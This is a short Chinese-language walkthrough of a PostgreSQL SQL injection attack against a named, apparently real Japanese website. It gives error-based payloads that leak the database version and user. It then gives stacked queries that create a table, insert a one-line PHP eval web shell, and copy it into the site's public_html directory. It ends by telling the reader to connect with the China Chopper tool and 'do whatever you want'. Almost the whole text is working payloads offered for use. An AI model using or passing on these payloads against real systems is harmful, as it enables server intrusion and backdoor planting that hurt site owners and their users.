不管是什么注入,第一步都一样,判断是否存在注入,就不再啰嗦了。
- postgers用户类似于root
获取数据库版本信息
and 1=cast(version() as int)
获取当前用户名称
and 1=cast(user||123 as int)
一切都是从发现是postgers用户开始的。。。
然后创建表ccc
;create table ccc(w text not null);
创建好表就可以开始写马了
;insert into ccc values($$<?php @eval($_POST[aaa]);?>$$);
然后导出来,路径看报错他给的啥,在这里他报的错就是在/home/kasugai_tochi/public_html/script/这个路径
;copy ccc(w) to $$/home/kasugai_tochi/public_html/script/1.php$$;
然后打开1.php,如果空白说明写入成功。(原网址是http://www.kasugai-tochi.jp/kensaku/data.php?id=307,然后新的是http://www.kasugai-tochi.jp/script/1.php)这里的路径变化需要自己理解。
然后嘛,打开菜刀,你可以为所欲为了。